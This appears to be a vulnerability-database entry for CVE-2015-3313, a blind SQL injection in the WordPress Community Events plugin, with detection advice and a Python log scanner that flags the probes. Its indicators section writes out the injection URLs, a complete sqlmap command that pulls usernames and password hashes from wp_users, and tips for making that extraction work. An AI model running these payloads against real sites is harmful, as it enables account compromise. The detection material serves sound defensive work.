CVE-2015-3313
published 2017-09-07

CVE-2015-3313: SQL injection vulnerability in WordPress Community Events plugin before 1.4.

Priority: P265 · critical · 9.8 (CVSS 3.0)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 8.34% (94.3th percentile)

Affected

1 range

| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| community_events_project | community_events | <= 1.3.5 | |

Detection & IOCs (extracted from sources)

url: `http://www.site.com/?page_id=2&eventyear=2015 AND 1=1 )--&dateset=on&eventday=1`
url: `http://www.site.com/?page_id=2&eventyear=2015 AND 1=0 )--&dateset=on&eventday=1`
command: `sqlmap -u "http://www.site.com/?page_id=2&eventyear=2015&dateset=on&eventday=1" -p "eventyear" --technique=B --dbms=mysql --suffix=")--" --string="Test" --sql-query="select user_login,user_pass from wp_users"`
  • Monitor HTTP requests targeting the `eventyear` GET parameter for SQL injection payloads, specifically patterns containing SQL boolean logic (e.g., `AND 1=1`, `AND 1=0`) and the `)--` suffix used to close and comment out the injected query.
  • The attack requires the `dateset=on` and `eventday=1` parameters to be present alongside the malicious `eventyear` value — use this combination as a detection correlation signal in WAF/IDS rules.
  • This is a blind Boolean-based SQL injection; detection should account for repeated near-identical requests differing only in the boolean condition (true vs. false), which is characteristic of blind SQLi enumeration.
  • The exploitation target is the Community Events plugin full schedule page; alert on requests to WordPress pages with `eventyear` parameter containing non-numeric characters or SQL keywords.
  • Exploitation requires at least one planned event to exist on the calendar; without an event, the true/false differentiation used in blind SQLi is not possible.
  • When using sqlmap, the `--string` parameter must contain part of the name of an existing event to allow sqlmap to differentiate between true and false SQL responses.
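
The detection points above can be combined into one log check. The following is an added example, not code from this page or from the plugin; the simplified log format, the sample lines, and the names `classify` and `scan` are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines (client IP + request line); not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 "GET /?page_id=2&eventyear=2015&dateset=on&eventday=1 HTTP/1.1"',
    '198.51.100.9 "GET /?page_id=2&eventyear=2015%20AND%201=1%20)--&dateset=on&eventday=1 HTTP/1.1"',
    '198.51.100.9 "GET /?page_id=2&eventyear=2015%20AND%201=0%20)--&dateset=on&eventday=1 HTTP/1.1"',
    '192.0.2.44 "GET /?page_id=5&eventyear=2016abc HTTP/1.1"',
]

LINE_RE = re.compile(r'^(\S+) "[A-Z]+ (\S+) HTTP/[\d.]+"$')
SQL_WORD = re.compile(r"\b(?:and|or|union|select)\b", re.I)
BOOL_COND = re.compile(r"\d+\s*=\s*\d+")  # boolean test such as 1=1 or 1=0


def classify(line):
    """Return (ip, eventyear, reasons) for a suspicious request, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, target = m.groups()
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
    year = qs.get("eventyear", [None])[0]
    if year is None or re.fullmatch(r"[0-9]{1,4}", year):
        return None  # parameter absent, or a plain numeric year
    reasons = ["non-numeric eventyear"]
    if SQL_WORD.search(year) or BOOL_COND.search(year):
        reasons.append("SQL boolean logic")
    if ")--" in year:
        reasons.append("')--' suffix")
    if qs.get("dateset") == ["on"] and "eventday" in qs:
        reasons.append("dateset=on + eventday present")
    return ip, year, reasons


def scan(lines):
    """Return (alerts, clients that sent true/false variants of one payload)."""
    alerts, variants = [], defaultdict(set)
    for line in lines:
        hit = classify(line)
        if hit:
            alerts.append(hit)
            # Mask the boolean test so true/false probes share one template.
            variants[(hit[0], BOOL_COND.sub("<cond>", hit[1]))].add(hit[1])
    blind = sorted({ip for (ip, _), seen in variants.items() if len(seen) > 1})
    return alerts, blind


if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

A client listed in the second return value sent requests that differ only in the boolean condition, which is the blind-enumeration pattern described above.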

CVSS provenance

nvd · v3.0 · 9.8 CRITICAL · CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd · v2.0 · 7.5 HIGH · AV:N/AC:L/Au:N/C:P/I:P/A:P